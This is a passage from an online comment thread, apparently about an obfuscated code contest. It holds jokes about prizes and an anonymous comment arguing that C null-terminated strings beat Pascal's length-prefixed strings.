    To phrase it differently: the malicious hackers already know all these tricks and secrets. By exposing them, we can protect ourselves.

  107. I have 3 dots in obfuscate by mister_llah · · Score: 1

    Perhaps this will distract all the worm writers, malware creators, and other degenerates... but the question then becomes what is more enticing...

    chaos... or beer?

    ===

    I have to say... this is much more interesting, at least, than an "Obfuscated FoxPro" contest...

    --
    MoM++ - A Classic Expanded - [Master of Magic 1.5]
    http://mompp.sourceforge.net/
  108. Inevitable nutcase by epaga · · Score: 1

    How about free p0rn instead of beer? MOD ME UP, BABY!

  109. Prize Should Reflect Competition by davidbofinger · · Score: 1

    The prize should be absinthe, in a plastic bottle labeled "lime cordial".

  110. C style strings by Anonymous Coward · · Score: 0

    I used to program Pascal. You know what was the worst problem with that language? The strings had the size up front. This limits the string length to the highest value of the length "variable".

    In Pascal the length was a byte. A string could contain 255 chars only. Useless for anything but simple writeline's.

    Ok, you probably say, then let's make the size 16 bit (which makes the string into a struct, since the rest is still chars, ruining the simplicity of C). 16 bits. That's 64 kilobytes, and 64k should be enough for anyone, right? (or was it 640k).

    Ok, you probably say, then let's make the size 32 bit. Other people made that mistake before, that's why we have O_LARGEFILE, to tell the system "oh, by the way, this file might be bigger than 2 GB").

    Where everyone else is busy resizing their variables because they reached the limit they thought was big enough (remember Y2k?), C strings are only limited by the available memory. In 2050, C strings will still be able to hold however long text you throw at them, no matter how many exabyte stuff has grown to by then. (yeah yeah, won't happen, right? Remember when you could have the OS and word processor on the same floppy?).

    As for "but I can't store a 0 (\0 in C)". No. How do you pronounce it anyway? Remember we are talking about text strings. If you want to store other things, don't use a text container, use something that's intended for it. Just don't expect the string functions to work on it, as they are meant for text strings.